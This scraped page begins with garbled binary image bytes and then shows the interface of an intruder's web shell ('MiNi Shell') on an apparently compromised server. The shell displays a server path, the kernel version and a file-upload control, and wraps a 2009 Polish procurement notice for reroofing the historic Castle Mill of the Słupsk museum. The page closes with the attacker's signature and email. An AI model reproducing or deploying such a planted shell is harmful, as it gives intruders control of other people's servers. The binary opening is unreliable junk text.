JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090602/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090602/175516-N-2009.html

<p class="kh_header"><b>Słupsk: Remont pokrycia dachowego zabytkowego obiektu XIV w. Młyna Zamkowego z Małą Elektrownia Wodną dla potrzeb Muzeum Pomorza Środkowego w Słupsku, realizowanego w ramach zadania inwestycyjnego pn. Remont pokrycia dachowego XIV w. Młyna Zamkowego z Małą Elektrownia Wodna oraz kładki i fosy.</b><br>
<b>Numer ogłoszenia: 175516 - 2009; data zamieszczenia: 02.06.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Pomorza Środkowego w Słupsku , ul. Dominikańska 5-9, 76-200 Słupsk, woj. pomorskie, tel. 059 8424081/82 w. 320, 8463020, faks 059 8426518.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa Instytucja Kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont pokrycia dachowego zabytkowego obiektu XIV w. Młyna Zamkowego z Małą Elektrownia Wodną dla potrzeb Muzeum Pomorza Środkowego w Słupsku, realizowanego w ramach zadania inwestycyjnego pn. Remont pokrycia dachowego XIV w. Młyna Zamkowego z Małą Elektrownia Wodna oraz kładki i fosy..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia stanowią roboty budowlane związane z remontem istniejącego pokrycia dachowego na obiekcie zabytkowym XIV w. Młyna Zamkowego z Małą Elektrownia Wodną, wpisanego do rejestru zabytków decyzją Wojewódzkiego Pomorskiego Konserwatora Zabytków pod. poz. A-46, działka ewidencyjna Nr 553, położona w Słupsku przy ul. Dominikańskiej 5-9. Zakres robót budowlanych obejmować będzie:
a) roboty zewnętrzne tj. wymianę pokrycia dachowego, wzmocnienie więźby dachowej, wymianę rynien, rur spustowych, obróbki blacharskie, wymianę okien dachowych, przemurowanie komina;
b) roboty wewnętrzne tj.: powiększenie otworów drzwiowych w pomieszczeniach poddasza, wykonanie nadproży drzwiowych, przestawienie ścianki działowej, wymiana okładzin ścian i posadzek, roboty malarskie. c) roboty branżowe tj. wymiana osprzętu elektrycznego i urządzeń sanitarnych w pomieszczeniach poddasza.
d) roboty towarzyszące tj. wywóz gruzu.
Zamawiający posiada opracowaną dokumentację - projekt budowlany remontu pokrycia dachowego, decyzję pozwalającą na prowadzenie prac budowlano-konserwatorskich w obiekcie zabytkowym nr ZN-I-4151/1/984/2009 z dnia 19.05.2009r, wydaną przez Wojewódzki Urząd Ochrony Zabytków w Gdańsku, Delegatura w Słupsku oraz decyzję  Nr 172/2009 z dnia 27.05.2009r. wydaną przez Wydział Administracji Budowlanej Urzędu Miejskiego w Słupsku - pozwolenie na budowę..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.23.32.28-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Ustala się wadium dla całości przedmiotu zamówienia w wysokości: 5.500,00 zł (słownie: pięć tysięcy pięćset złotych).  Wykonawca wnosi wadium: 8.1) w pieniądzu, sposób przekazania:  przelewem na konto Zamawiającego w BS Ustka, nr konta: 15931500040050244520000010 lub w jednej z poniżej podanych form:  a) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym,  b) w gwarancjach bankowych,  c) w gwarancjach ubezpieczeniowych  d) w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158, z p. zm.)  sposób przekazania: w kasie Zamawiającego. 8.2. Wadium wnosi się przed upływem terminu składania ofert. Przy czym za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku zamawiającego.  8.3. Z udziału w postępowaniu wyklucza się wykonawców, którzy nie nieśli wadium w wymaganym terminie.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienie mogą ubiegać się wykonawcy potwierdzający spełnienie warunków:   7.1 Posiadający uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień( art. 22 ust.1 pkt. 1 Pzp) tj.:
1)	posiadają aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji gospodarczej,
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania przedmiotu zamówienia (art. 22 ust.1 pkt. 2 Pzp) tj.:
a) dysponują lub będą dysponowali osobą posiadającą uprawnienia do kierowania robotami budowlanymi o specjalności budowlanej konstrukcyjno-budowlanej oraz osoba ta odbyła co najmniej 2-letnią praktykę zawodowa na budowie przy zabytkach nieruchomych - zgodnie z § 8 ust.1 rozporządzenia Ministra Kultury z dnia 9 czerwca 2004r. (Dz.U. Nr 150 z 2004r. poz.1579) w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych;
b) w okresie ostatnich 5 lat przed dniem wszczęcia niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wykonali co n najmniej jedna robotę budowlaną, polegającą na wykonaniu remontu dachu, w tym ułożyli pokrycie dachowe o powierzchni min. 400 m2.
c) znajdują się wy sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia (art. 22 ust.1 pkt. 3 Pzp) i są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na sumę ubezpieczenia:
- z tytułu odpowiedzialności deliktowej na kwotę nie mniejszą niż wartość brutto składanej oferty;
- z tytułu odpowiedzialności kontraktowej na kwotę nie mniejszą niż 500.000,00 zł, tzn. posiada na dzień wszczęcia postępowania pełna ochronę ubezpieczeniową OC zakładu ubezpieczeniowego.
d) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy Pzp.
e) udzielą 36 miesięcznej pisemnej gwarancji jakości na wykonany przedmiot zamówienia oraz 36 miesięcznej rękojmi, licząc od dnia przyjęcia przedmiotu zamówienia przez Zamawiającego.

7.2. Ocena spełnienia w/w  warunków dokonana zostanie w oparciu o informacje zawarte w dokumentach i oświadczeniach złożonych wraz z ofertą Wykonawcy, zgodnie z formuła - spełnia - nie spełnia. W toku oceny spełniania warunków udziału w postępowaniu Zamawiający, o ile zajdzie taka potrzeba:
- wezwie Wykonawców, którzy w określonym terminie nie złożyli oświadczeń i dokumentów potwierdzających spełnienie warunków udziału w postępowaniu lub którzy złożyli dokumenty zawierające błędy, do ich uzupełnienia w wyznaczonym terminie, chyba że mimo ich uzupełnienia konieczne byłoby unieważnienie postępowania (art. 26, ust. 3 ustawy Pzp);
- wezwie Wykonawców, w wyznaczonym przez siebie terminie, do złożenia wyjaśnień dotyczących oświadczeń i dokumentów, o których mowa w art. 25 ust.1 ustawy Pzp. 
7.3. Wykonawcy wspólnie ubiegający się o udzielnie niniejszego zamówienia zobowiązani są do ustanowienia Pełnomocnika do reprezentowania ich w niniejszym postępowaniu, albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
7.4. Z ubiegania się o zamówienia publicznego wyklucza się wykonawców, którzy: a) Nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z art. 22 Prawa zamówień publicznych opisanych w ppkt. 7.1. b) Podlegają  wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 Prawa zamówień publicznych..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 7.5.1. W celu wykazania spełnienia warunków udziału w postępowaniu opisanych w pkt. 7.1. Wykonawca ubiegający się o udzielenie zamówienia powinien przedłożyć wraz z ofertą następujące oświadczenia i dokumenty:
a) oświadczenie o spełnieniu warunków określonych w art. 22 ust.1 Pzp, stanowiące załącznik Nr 1 do oferty (przypadku wspólnego ubiegania się dwóch lub więcej wykonawców o udzielenie niniejszego zamówienia - oświadczenie składa ten lub ci z wykonawców, którzy w imieniu wszystkich wykazywać będą spełnienie tego warunku) - złożone w oryginale;
b) oświadczenie wykonawcy, że nie podlega wykluczeniu z postępowania, stanowiące załącznik Nr 2 do oferty ( w przypadku wspólnego ubiegania się o zamówienie przez dwóch lub więcej wykonawców do oferty należy załączyć przedmiotowe oświadczenie złożone przez każdego z nich)- złożone w oryginale;
c) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wydane nie wcześniej niż 6 miesięcy przed upływem terminu do składania ofert (w przypadku wspólnego ubiegania się o zamówienie przez dwóch lub więcej wykonawców do oferty należy załączyć przedmiotowe zaświadczenie złożone przez każdego z nich);
d) wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonaniu zamówienia , na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także powierzone im czynności, sporządzony na podstawie wzoru stanowiącego załącznik nr 1 do Rozdiału II SIWZ. Do wykazu należy dołączyć dokumenty potwierdzające spełnienie warunków opisanych w pkt. 7.1. lit. a. (w przypadku wspólnego ubiegania się o zamówienie przez dwóch lub więcej wykonawców ocenia podlegać będzie wspólny potencjał kadrowy oraz łączne kwalifikacje);
e) pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie wymienionym powyżej - lit. d., wykonawca wskazał osoby, którymi będzie dysponował;
f) dokumenty stwierdzające, ze osoba o której mowa w opisie warunków w pkt. 7.1, ppkt. 2 a) posiada wymagane uprawnienia budowlane:
- decyzję o nadaniu uprawnień,
- aktualne zaświadczenie o wpisie na listę członków właściwej izby samorządu zawodowego,
- zaświadczenie o posiadaniu kwalifikacji w zakresie nadzoru nad pracami budowlanymi przy zabytkowych obiektach architektury, zgodnie z § 8 ust.3 Rozporządzenia Ministra Kultury z dnia 9.06.2004r., w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych (Dz.U. Nr 150 z 2004r., poz. 1579).
g) wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom, będącym przedmiotem niniejszego postępowania, z podaniem ich wartości, zakresu robót, dat wykonania i odbiorców, sporządzony na podstawie wzoru stanowiącego załącznik nr 4 do formularza oferty. Wykaz winien zawierać informacje potwierdzające spełnienie warunku opisanego w pkt. 7.1. 2b) potwierdzające, że roboty zostały wykonane należycie (w przypadku wspólnego ubiegania się o zamówienie przez dwóch lub więcej wykonawców ocenie podlegać będzie wspólne doświadczenie);
h) polisa, a w przypadku jej braku inny dokument ubezpieczenia, potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej - złożona zgodnie z opisem warunków w pkt. 7.1. 2c) ( w przypadku wspólnego ubiegania się dwóch lub więcej wykonawców o udzielenie niniejszego zamówienia, ocenie podlegać będzie dokument złożony przez tego lub tych wykonawców, którzy w imieniu wszystkich wykazywać będą jego spełnienie)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.muzeum.slupsk.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Muzeum Pomorza Środkowego w Słupsku, ul. Dominikańska 5-9, 76-200 Słupsk, Dział Aadministracyjny - pok. Nr 10.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.06.2009 godzina 10:00, miejsce: W siedzibie zamawiającego tj. 76-200 Słupsk, ul. Dominikańska 5-9, pokój Nr 7 (Sekretariat)..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com